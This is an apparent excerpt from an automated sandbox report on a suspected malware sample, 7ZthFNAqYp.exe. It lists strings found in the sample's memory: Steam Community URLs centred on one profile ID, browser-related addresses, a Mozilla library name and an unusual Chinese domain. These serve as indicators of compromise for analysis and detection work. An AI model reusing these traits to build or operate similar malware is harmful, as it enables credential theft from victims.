Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&am
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=i46kIf4uDBX
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: CFCFHJ.2.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107$
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/badges
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/inventory/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997866021077
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107H
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampo
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/
